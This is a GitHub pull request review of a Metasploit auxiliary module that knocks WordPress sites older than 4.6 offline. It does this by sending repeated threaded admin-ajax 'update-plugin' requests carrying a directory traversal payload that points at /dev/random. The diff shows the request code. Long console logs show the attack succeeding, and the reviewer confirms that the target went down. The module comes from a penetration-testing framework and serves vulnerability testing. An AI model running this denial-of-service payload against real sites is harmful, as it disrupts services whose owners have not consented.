### PR TITLE
WordPress Directory Traversal DoS module

### PR DESCRIPTION
**Pull request by JulienPlas**
This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. Allows remote authenticated users to cause a denial of service (with /dev/random read operations).

## Verification

- [x] Start `msfconsole`
- [x] `use auxiliary/dos/http/wordpress_directory_traversal_dos.rb`
- [x] `set RHOST <ip target site>`
- [x] `set TARGETURI <WordPress path>`
- [x] `set USERNAME <Valid Username>`
- [x] `set PASSWORD <Valid Password>`
- [x] `exploit`

 
## Scenarios

```
msf auxiliary(wordpress_directory_traversal_dos) > exploit

[*] Checking if user "test" exists...
[+] Username "test" is valid
[*] Executing requests 1 - 5...
[+] Finished executing requests 1 - 5
[*] Executing requests 6 - 10...
[+] Finished executing requests 6 - 10
...
[*] Executing requests 191 - 195...
[+] Finished executing requests 191 - 195
[*] Executing requests 196 - 200...
[+] Finished executing requests 196 - 200
[+] SUCCESS: /wordpress appears to be down
[*] Auxiliary module execution completed

### CODE REVIEW

File: modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb [hunk 1]
```diff
@@ -0,0 +1,160 @@
...
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress Traversal Directory DoS',
+      'Description'     =>  %q{Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in WordPress before 4.6 allows remote attackers to hijack the authentication of subscribers for /dev/random read operations by leveraging a late call to the check_ajax_referer function, a related issue to CVE-2016-6896.},
```
Comment (h00die) [inline modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb]: can you break this up to multiple lines so its easier to read similar to https://github.com/rapid7/metasploit-framework/pull/8422/files#diff-992718cb1437d7e3d005df7439f53f30R14

File: modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb [hunk 2]
```diff
@@ -0,0 +1,160 @@
...
+        1.upto(ubound) do |i|
+          threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|
+            begin
+              # shell code
+              res = send_request_cgi( opts = {
+                'method' => 'POST',
+                'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
+                'vars_post' => {
+                  'action' => 'update-plugin',
+                  'plugin' => '../../../../../../../../../../dev/random'
```
Comment (h00die) [inline modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb]: I would make the depth configurable and set the default to 10

**Review by h00die — CHANGES_REQUESTED** [review]
Overall looks very nicely coded.
Don't change it now, but next time submit the PR from a non-master branch.

I can test this in the next few days if you get the changes made

**Comment by h00die** [comment]
Please also add documentation see https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation

**Comment by h00die** [comment]
working for me
```
msf > use auxiliary/dos/http/wordpress_directory_traversal_dos 
msf auxiliary(wordpress_directory_traversal_dos) > set rhost 1.2.3.241
rhost => 1.2.3.241
msf auxiliary(wordpress_directory_traversal_dos) > set verbose true
verbose => true
msf auxiliary(wordpress_directory_traversal_dos) > set targeturi /wordpress
targeturi => /wordpress
msf auxiliary(wordpress_directory_traversal_dos) > set username subscriber
username => subscriber
msf auxiliary(wordpress_directory_traversal_dos) > set password subscriber
password => subscriber
msf auxiliary(wordpress_directory_traversal_dos) > run

[*] Checking if user "subscriber" exists...
[+] Username "subscriber" is valid
[!] No active DB -- Credential data will not be saved!
[*] Executing requests 1 - 5...
[+] Finished executing requests 1 - 5
[*] Executing requests 6 - 10...
[+] Finished executing requests 6 - 10
[*] Executing requests 11 - 15...
[+] Finished executing requests 11 - 15
[*] Executing requests 16 - 20...
[+] Finished executing requests 16 - 20
[*] Executing requests 21 - 25...
[+] Finished executing requests 21 - 25
[*] Executing requests 26 - 30...
[+] Finished executing requests 26 - 30
[*] Executing requests 31 - 35...
[+] Finished executing requests 31 - 35
[*] Executing requests 36 - 40...
[+] Finished executing requests 36 - 40
[*] Executing requests 41 - 45...
[+] Finished executing requests 41 - 45
[*] Executing requests 46 - 50...
[+] Finished executing requests 46 - 50
[*] Executing requests 51 - 55...
[+] Finished executing requests 51 - 55
[*] Executing requests 56 - 60...
[+] Finished executing requests 56 - 60
[*] Executing requests 61 - 65...
[+] Finished executing requests 61 - 65
[*] Executing requests 66 - 70...
[+] Finished executing requests 66 - 70
[*] Executing requests 71 - 75...
[+] Finished executing requests 71 - 75
[*] Executing requests 76 - 80...
[+] Finished executing requests 76 - 80
[*] Executing requests 81 - 85...
[+] Finished executing requests 81 - 85
[*] Executing requests 86 - 90...
[+] Finished executing requests 86 - 90
[*] Executing requests 91 - 95...
[+] Finished executing requests 91 - 95
[*] Executing requests 96 - 100...
[+] Finished executing requests 96 - 100
[*] Executing requests 101 - 105...
[+] Finished executing requests 101 - 105
[*] Executing requests 106 - 110...
[+] Finished executing requests 106 - 110
[*] Executing requests 111 - 115...
[+] Finished executing requests 111 - 115
[*] Executing requests 116 - 120...
[+] Finished executing requests 116 - 120
[*] Executing requests 121 - 125...
[+] Finished executing requests 121 - 125
[*] Executing requests 126 - 130...
[+] Finished executing requests 126 - 130
[*] Executing requests 131 - 135...
[+] Finished executing requests 131 - 135
[*] Executing requests 136 - 140...
[+] Finished executing requests 136 - 140
[*] Executing requests 141 - 145...
[+] Finished executing requests 141 - 145
[*] Executing requests 146 - 150...
[+] Finished executing requests 146 - 150
[*] Executing requests 151 - 155...
[+] Finished executing requests 151 - 155
[*] Executing requests 156 - 160...
[+] Finished executing requests 156 - 160
[*] Executing requests 161 - 165...
[+] Finished executing requests 161 - 165
[*] Executing requests 166 - 170...
[+] Finished executing requests 166 - 170
[*] Executing requests 171 - 175...
[+] Finished executing requests 171 - 175
[*] Executing requests 176 - 180...
[+] Finished executing requests 176 - 180
[*] Executing requests 181 - 185...
[+] Finished executing requests 181 - 185
[*] Executing requests 186 - 190...
[+] Finished executing requests 186 - 190
[*] Executing requests 191 - 195...
[+] Finished executing requests 191 - 195
[*] Executing requests 196 - 200...
[+] Finished executing requests 196 - 200
[+] SUCCESS: /wordpress appears to be down
[*] Auxiliary module execution completed

```

then manually confirmed the site is down w/ a different computer that it was hosed, and it was.

**Comment by h00die** [comment]
setting depth to 1 didn't take down the site (as expected)

File: documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md [hunk 3]
```diff
@@ -0,0 +1,31 @@
+This module exploits a Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. Allows remote authenticated users to cause a denial of service (with /dev/random read operations).
```
Comment (h00die) [inline documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md]:
```
[wp_ajax_update_plugin](https://core.trac.wordpress.org/changeset/38168)
```

Comment (h00die) [inline documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md]: This section is missing its header:

```
## Vulnerable Application
```

Comment (h00die) [inline documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md]: add a link to the changeset, why not!

Comment (h00die) [inline documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md]: Add a link to the vuln app:
```
[Wordpress 4.5.9](https://wordpress.org/wordpress-4.5.9.tar.gz) and others can be downloaded from the [archive](https://wordpress.org/download/release-archive/)
```

File: documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md [hunk 4]
```diff
@@ -0,0 +1,31 @@
...
+## Verification
```
Comment (h00die) [inline documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md]: Verification **Steps**

File: documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md [hunk 5]
```diff
@@ -0,0 +1,31 @@
...
+1. Start msfconsole
+2. Do: ```use auxiliary/dos/http/wordpress_directory_traversal_dos.rb```
+3. Do: ```set RHOST <ip target site>```
+4. Do: ```set TARGETURI <WordPress path>```
+5. Do: ```set USERNAME <Valid Username>```
+6. Do: ```set PASSWORD <Valid Password>```
+7. Do: ```exploit```
+8. WordPress website should be down
+
+## Scenarios
```
Comment (h00die) [inline documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md]: Add a 3rd level heading with details of what was tested here which can help for debugging it in 5yrs or so if someone had to come back and look.
```
### Wordpress 4.5.9 on Ubuntu 16.04.02
```

**Review by h00die — CHANGES_REQUESTED** [review]
Last set of changes to the docs and i'm happy to get this merged, functionality is all there and verified to be working.

**Comment by h00die** [comment]
Fixed up the markdown formatting https://github.com/rapid7/metasploit-framework/commit/eb87185e259f116143e4c4ee925b97fa431c0c62

**Comment by h00die** [comment]
@JulienPlas Thanks for the submission!

**Comment by h00die** [comment]
# Release Notes
This pull adds a DoS against Wordpress < 4.6 utilizing a CSRF to `/dev/random`

File: documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md (hunk 5 above)
Comment (selselmen) [inline documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md]: hey what will ı write to targeturi can you help me please
